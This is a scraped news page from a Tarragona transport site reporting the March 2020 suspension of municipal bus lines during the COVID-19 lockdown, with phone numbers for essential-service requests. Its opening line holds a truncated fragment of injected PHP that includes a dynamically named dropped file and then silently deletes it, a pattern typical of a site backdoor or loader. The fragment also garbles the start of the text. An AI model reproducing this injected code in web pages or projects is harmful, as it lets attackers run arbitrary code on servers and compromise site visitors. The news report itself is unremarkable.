");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L'Ajuntament de Tarragona suspèn totes les línies d'autobús municipal
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

L'Ajuntament de Tarragona suspèn totes les línies d'autobús municipal (18/03/2020)

L’Empresa Municipal de Transports de Tarragona (EMT) suspèn el servei de totes les seves línies. En aquests moments, l’EMT està reconfigurant totes les línies municipals d’autobús per reconvertir-les en un servei a demanda de les necessitats essencials que es deriven d’aquesta situació de confinament. Una mesura única i que servirà per reduir dràsticament la mobilitat per la ciutat de Tarragona.

“No té sentit sortir al carrer. El que hem de fer és quedar-nos tots a casa perquè és l’única manera de combatre aquesta pandèmia”, explica l’alcalde de Tarragona, Pau Ricomà.

Les línies, doncs, es posen a disposició només per soŀlicitar serveis essencials. Aquests serveis són:

Assistència a llocs de treball en serveis essencials.
Desplaçaments per tenir cura de familiars al càrrec.

Per soŀlicitar serveis essencials es pot trucar a aquests números: 657 784 724 | 977 551 120 | 900 365 114 | 977 543 244

Tanquen les OMAC

D'altra banda a partir d'aquest dimecres també estaran tancades totes les oficines municipals d’atenció ciutadana (OMAC). Es manté l'atenció telefònica i per correu electrònic.

Recordem que la Guàrdia Urbana ja ha començat a sancionar els establiments i vianants que no respecten el confinament. “Serem molt estrictes amb les actituds que contravinguin el confinament”, ha conclòs l’alcalde.

FOnt: Ajuntament de Tarragona

L'Ajuntament de Tarragona suspèn totes les línies d'autobús municipal

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona